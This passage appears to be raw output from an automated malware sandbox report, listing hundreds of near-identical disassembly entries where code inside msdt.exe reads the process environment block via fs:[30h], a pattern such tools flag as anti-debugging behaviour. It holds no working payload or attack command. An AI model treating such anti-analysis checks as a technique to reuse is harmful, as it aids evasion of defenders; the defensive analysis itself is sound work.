          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC9080 mov eax, dword ptr fs:[00000030h]15_2_04AC9080
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B43884 mov eax, dword ptr fs:[00000030h]15_2_04B43884
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B43884 mov eax, dword ptr fs:[00000030h]15_2_04B43884
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD849B mov eax, dword ptr fs:[00000030h]15_2_04AD849B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC58EC mov eax, dword ptr fs:[00000030h]15_2_04AC58EC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B814FB mov eax, dword ptr fs:[00000030h]15_2_04B814FB
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46CF0 mov eax, dword ptr fs:[00000030h]15_2_04B46CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46CF0 mov eax, dword ptr fs:[00000030h]15_2_04B46CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46CF0 mov eax, dword ptr fs:[00000030h]15_2_04B46CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5B8D0 mov eax, dword ptr fs:[00000030h]15_2_04B5B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5B8D0 mov ecx, dword ptr fs:[00000030h]15_2_04B5B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5B8D0 mov eax, dword ptr fs:[00000030h]15_2_04B5B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5B8D0 mov eax, dword ptr fs:[00000030h]15_2_04B5B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5B8D0 mov eax, dword ptr fs:[00000030h]15_2_04B5B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5B8D0 mov eax, dword ptr fs:[00000030h]15_2_04B5B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B98CD6 mov eax, dword ptr fs:[00000030h]15_2_04B98CD6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF002D mov eax, dword ptr fs:[00000030h]15_2_04AF002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF002D mov eax, dword ptr fs:[00000030h]15_2_04AF002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF002D mov eax, dword ptr fs:[00000030h]15_2_04AF002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF002D mov eax, dword ptr fs:[00000030h]15_2_04AF002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF002D mov eax, dword ptr fs:[00000030h]15_2_04AF002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFBC2C mov eax, dword ptr fs:[00000030h]15_2_04AFBC2C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADB02A mov eax, dword ptr fs:[00000030h]15_2_04ADB02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADB02A mov eax, dword ptr fs:[00000030h]15_2_04ADB02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADB02A mov eax, dword ptr fs:[00000030h]15_2_04ADB02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADB02A mov eax, dword ptr fs:[00000030h]15_2_04ADB02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B47016 mov eax, dword ptr fs:[00000030h]15_2_04B47016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B47016 mov eax, dword ptr fs:[00000030h]15_2_04B47016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B47016 mov eax, dword ptr fs:[00000030h]15_2_04B47016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B94015 mov eax, dword ptr fs:[00000030h]15_2_04B94015
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B94015 mov eax, dword ptr fs:[00000030h]15_2_04B94015
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B9740D mov eax, dword ptr fs:[00000030h]15_2_04B9740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B9740D mov eax, dword ptr fs:[00000030h]15_2_04B9740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B9740D mov eax, dword ptr fs:[00000030h]15_2_04B9740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]15_2_04B81C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]15_2_04B81C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]15_2_04B81C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]15_2_04B81C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]15_2_04B81C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]15_2_04B81C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]15_2_04B81C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]15_2_04B81C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]15_2_04B81C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]15_2_04B81C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]15_2_04B81C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]15_2_04B81C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]15_2_04B81C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]15_2_04B81C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46C0A mov eax, dword ptr fs:[00000030h]15_2_04B46C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46C0A mov eax, dword ptr fs:[00000030h]15_2_04B46C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46C0A mov eax, dword ptr fs:[00000030h]15_2_04B46C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46C0A mov eax, dword ptr fs:[00000030h]15_2_04B46C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE746D mov eax, dword ptr fs:[00000030h]15_2_04AE746D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B82073 mov eax, dword ptr fs:[00000030h]15_2_04B82073
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B91074 mov eax, dword ptr fs:[00000030h]15_2_04B91074
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFA44B mov eax, dword ptr fs:[00000030h]15_2_04AFA44B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5C450 mov eax, dword ptr fs:[00000030h]15_2_04B5C450
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5C450 mov eax, dword ptr fs:[00000030h]15_2_04B5C450
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE0050 mov eax, dword ptr fs:[00000030h]15_2_04AE0050
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE0050 mov eax, dword ptr fs:[00000030h]15_2_04AE0050
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B451BE mov eax, dword ptr fs:[00000030h]15_2_04B451BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B451BE mov eax, dword ptr fs:[00000030h]15_2_04B451BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B451BE mov eax, dword ptr fs:[00000030h]15_2_04B451BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B451BE mov eax, dword ptr fs:[00000030h]15_2_04B451BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF35A1 mov eax, dword ptr fs:[00000030h]15_2_04AF35A1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF61A0 mov eax, dword ptr fs:[00000030h]15_2_04AF61A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF61A0 mov eax, dword ptr fs:[00000030h]15_2_04AF61A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B469A6 mov eax, dword ptr fs:[00000030h]15_2_04B469A6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF1DB5 mov eax, dword ptr fs:[00000030h]15_2_04AF1DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF1DB5 mov eax, dword ptr fs:[00000030h]15_2_04AF1DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF1DB5 mov eax, dword ptr fs:[00000030h]15_2_04AF1DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC2D8A mov eax, dword ptr fs:[00000030h]15_2_04AC2D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC2D8A mov eax, dword ptr fs:[00000030h]15_2_04AC2D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC2D8A mov eax, dword ptr fs:[00000030h]15_2_04AC2D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC2D8A mov eax, dword ptr fs:[00000030h]15_2_04AC2D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC2D8A mov eax, dword ptr fs:[00000030h]15_2_04AC2D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFA185 mov eax, dword ptr fs:[00000030h]15_2_04AFA185
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AEC182 mov eax, dword ptr fs:[00000030h]15_2_04AEC182
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF2581 mov eax, dword ptr fs:[00000030h]15_2_04AF2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF2581 mov eax, dword ptr fs:[00000030h]15_2_04AF2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF2581 mov eax, dword ptr fs:[00000030h]15_2_04AF2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF2581 mov eax, dword ptr fs:[00000030h]15_2_04AF2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFFD9B mov eax, dword ptr fs:[00000030h]15_2_04AFFD9B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFFD9B mov eax, dword ptr fs:[00000030h]15_2_04AFFD9B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF2990 mov eax, dword ptr fs:[00000030h]15_2_04AF2990
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B78DF1 mov eax, dword ptr fs:[00000030h]15_2_04B78DF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACB1E1 mov eax, dword ptr fs:[00000030h]15_2_04ACB1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACB1E1 mov eax, dword ptr fs:[00000030h]15_2_04ACB1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACB1E1 mov eax, dword ptr fs:[00000030h]15_2_04ACB1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADD5E0 mov eax, dword ptr fs:[00000030h]15_2_04ADD5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADD5E0 mov eax, dword ptr fs:[00000030h]15_2_04ADD5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B541E8 mov eax, dword ptr fs:[00000030h]15_2_04B541E8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46DC9 mov eax, dword ptr fs:[00000030h]15_2_04B46DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46DC9 mov eax, dword ptr fs:[00000030h]15_2_04B46DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46DC9 mov eax, dword ptr fs:[00000030h]15_2_04B46DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46DC9 mov ecx, dword ptr fs:[00000030h]15_2_04B46DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46DC9 mov eax, dword ptr fs:[00000030h]15_2_04B46DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46DC9 mov eax, dword ptr fs:[00000030h]15_2_04B46DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B4A537 mov eax, dword ptr fs:[00000030h]15_2_04B4A537
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B98D34 mov eax, dword ptr fs:[00000030h]15_2_04B98D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE4120 mov eax, dword ptr fs:[00000030h]15_2_04AE4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE4120 mov eax, dword ptr fs:[00000030h]15_2_04AE4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE4120 mov eax, dword ptr fs:[00000030h]15_2_04AE4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE4120 mov eax, dword ptr fs:[00000030h]15_2_04AE4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE4120 mov ecx, dword ptr fs:[00000030h]15_2_04AE4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF4D3B mov eax, dword ptr fs:[00000030h]15_2_04AF4D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF4D3B mov eax, dword ptr fs:[00000030h]15_2_04AF4D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF4D3B mov eax, dword ptr fs:[00000030h]15_2_04AF4D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF513A mov eax, dword ptr fs:[00000030h]15_2_04AF513A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF513A mov eax, dword ptr fs:[00000030h]15_2_04AF513A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]15_2_04AD3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]15_2_04AD3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]15_2_04AD3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]15_2_04AD3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]15_2_04AD3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]15_2_04AD3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]15_2_04AD3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]15_2_04AD3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]15_2_04AD3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]15_2_04AD3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]15_2_04AD3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]15_2_04AD3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]15_2_04AD3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACAD30 mov eax, dword ptr fs:[00000030h]15_2_04ACAD30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC9100 mov eax, dword ptr fs:[00000030h]15_2_04AC9100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC9100 mov eax, dword ptr fs:[00000030h]15_2_04AC9100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC9100 mov eax, dword ptr fs:[00000030h]15_2_04AC9100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACC962 mov eax, dword ptr fs:[00000030h]15_2_04ACC962
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AEC577 mov eax, dword ptr fs:[00000030h]15_2_04AEC577
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AEC577 mov eax, dword ptr fs:[00000030h]15_2_04AEC577
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACB171 mov eax, dword ptr fs:[00000030h]15_2_04ACB171
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACB171 mov eax, dword ptr fs:[00000030h]15_2_04ACB171
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AEB944 mov eax, dword ptr fs:[00000030h]15_2_04AEB944
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AEB944 mov eax, dword ptr fs:[00000030h]15_2_04AEB944
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B03D43 mov eax, dword ptr fs:[00000030h]15_2_04B03D43
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B43540 mov eax, dword ptr fs:[00000030h]15_2_04B43540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE7D50 mov eax, dword ptr fs:[00000030h]15_2_04AE7D50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC52A5 mov eax, dword ptr fs:[00000030h]15_2_04AC52A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC52A5 mov eax, dword ptr fs:[00000030h]15_2_04AC52A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC52A5 mov eax, dword ptr fs:[00000030h]15_2_04AC52A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC52A5 mov eax, dword ptr fs:[00000030h]15_2_04AC52A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC52A5 mov eax, dword ptr fs:[00000030h]15_2_04AC52A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B446A7 mov eax, dword ptr fs:[00000030h]15_2_04B446A7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B90EA5 mov eax, dword ptr fs:[00000030h]15_2_04B90EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B90EA5 mov eax, dword ptr fs:[00000030h]15_2_04B90EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B90EA5 mov eax, dword ptr fs:[00000030h]15_2_04B90EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADAAB0 mov eax, dword ptr fs:[00000030h]15_2_04ADAAB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADAAB0 mov eax, dword ptr fs:[00000030h]15_2_04ADAAB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFFAB0 mov eax, dword ptr fs:[00000030h]15_2_04AFFAB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5FE87 mov eax, dword ptr fs:[00000030h]15_2_04B5FE87
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFD294 mov eax, dword ptr fs:[00000030h]15_2_04AFD294
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFD294 mov eax, dword ptr fs:[00000030h]15_2_04AFD294
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF2AE4 mov eax, dword ptr fs:[00000030h]15_2_04AF2AE4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF16E0 mov ecx, dword ptr fs:[00000030h]15_2_04AF16E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD76E2 mov eax, dword ptr fs:[00000030h]15_2_04AD76E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF36CC mov eax, dword ptr fs:[00000030h]15_2_04AF36CC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF2ACB mov eax, dword ptr fs:[00000030h]15_2_04AF2ACB
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B98ED6 mov eax, dword ptr fs:[00000030h]15_2_04B98ED6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B7FEC0 mov eax, dword ptr fs:[00000030h]15_2_04B7FEC0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B08EC7 mov eax, dword ptr fs:[00000030h]15_2_04B08EC7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B7FE3F mov eax, dword ptr fs:[00000030h]15_2_04B7FE3F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACE620 mov eax, dword ptr fs:[00000030h]15_2_04ACE620
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B04A2C mov eax, dword ptr fs:[00000030h]15_2_04B04A2C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B04A2C mov eax, dword ptr fs:[00000030h]15_2_04B04A2C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD8A0A mov eax, dword ptr fs:[00000030h]15_2_04AD8A0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACC600 mov eax, dword ptr fs:[00000030h]15_2_04ACC600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACC600 mov eax, dword ptr fs:[00000030h]15_2_04ACC600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACC600 mov eax, dword ptr fs:[00000030h]15_2_04ACC600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF8E00 mov eax, dword ptr fs:[00000030h]15_2_04AF8E00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE3A1C mov eax, dword ptr fs:[00000030h]15_2_04AE3A1C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFA61C mov eax, dword ptr fs:[00000030h]15_2_04AFA61C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFA61C mov eax, dword ptr fs:[00000030h]15_2_04AFA61C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACAA16 mov eax, dword ptr fs:[00000030h]15_2_04ACAA16
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACAA16 mov eax, dword ptr fs:[00000030h]15_2_04ACAA16
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC5210 mov eax, dword ptr fs:[00000030h]15_2_04AC5210
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC5210 mov ecx, dword ptr fs:[00000030h]15_2_04AC5210
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC5210 mov eax, dword ptr fs:[00000030h]15_2_04AC5210
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC5210 mov eax, dword ptr fs:[00000030h]15_2_04AC5210
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD766D mov eax, dword ptr fs:[00000030h]15_2_04AD766D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B0927A mov eax, dword ptr fs:[00000030h]15_2_04B0927A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B7B260 mov eax, dword ptr fs:[00000030h]15_2_04B7B260
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B7B260 mov eax, dword ptr fs:[00000030h]15_2_04B7B260
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B98A62 mov eax, dword ptr fs:[00000030h]15_2_04B98A62
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AEAE73 mov eax, dword ptr fs:[00000030h]15_2_04AEAE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AEAE73 mov eax, dword ptr fs:[00000030h]15_2_04AEAE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AEAE73 mov eax, dword ptr fs:[00000030h]15_2_04AEAE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AEAE73 mov eax, dword ptr fs:[00000030h]15_2_04AEAE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AEAE73 mov eax, dword ptr fs:[00000030h]15_2_04AEAE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B54257 mov eax, dword ptr fs:[00000030h]15_2_04B54257
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC9240 mov eax, dword ptr fs:[00000030h]15_2_04AC9240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC9240 mov eax, dword ptr fs:[00000030h]15_2_04AC9240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC9240 mov eax, dword ptr fs:[00000030h]15_2_04AC9240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC9240 mov eax, dword ptr fs:[00000030h]15_2_04AC9240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD7E41 mov eax, dword ptr fs:[00000030h]15_2_04AD7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD7E41 mov eax, dword ptr fs:[00000030h]15_2_04AD7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD7E41 mov eax, dword ptr fs:[00000030h]15_2_04AD7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD7E41 mov eax, dword ptr fs:[00000030h]15_2_04AD7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD7E41 mov eax, dword ptr fs:[00000030h]15_2_04AD7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD7E41 mov eax, dword ptr fs:[00000030h]15_2_04AD7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF4BAD mov eax, dword ptr fs:[00000030h]15_2_04AF4BAD
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF4BAD mov eax, dword ptr fs:[00000030h]15_2_04AF4BAD
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF4BAD mov eax, dword ptr fs:[00000030h]15_2_04AF4BAD
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B95BA5 mov eax, dword ptr fs:[00000030h]15_2_04B95BA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B47794 mov eax, dword ptr fs:[00000030h]15_2_04B47794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B47794 mov eax, dword ptr fs:[00000030h]15_2_04B47794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B47794 mov eax, dword ptr fs:[00000030h]15_2_04B47794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD1B8F mov eax, dword ptr fs:[00000030h]15_2_04AD1B8F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD1B8F mov eax, dword ptr fs:[00000030h]15_2_04AD1B8F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B8138A mov eax, dword ptr fs:[00000030h]15_2_04B8138A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B7D380 mov ecx, dword ptr fs:[00000030h]15_2_04B7D380
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF2397 mov eax, dword ptr fs:[00000030h]15_2_04AF2397
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD8794 mov eax, dword ptr fs:[00000030h]15_2_04AD8794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFB390 mov eax, dword ptr fs:[00000030h]15_2_04AFB390
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B037F5 mov eax, dword ptr fs:[00000030h]15_2_04B037F5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF03E2 mov eax, dword ptr fs:[00000030h]15_2_04AF03E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF03E2 mov eax, dword ptr fs:[00000030h]15_2_04AF03E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF03E2 mov eax, dword ptr fs:[00000030h]15_2_04AF03E2
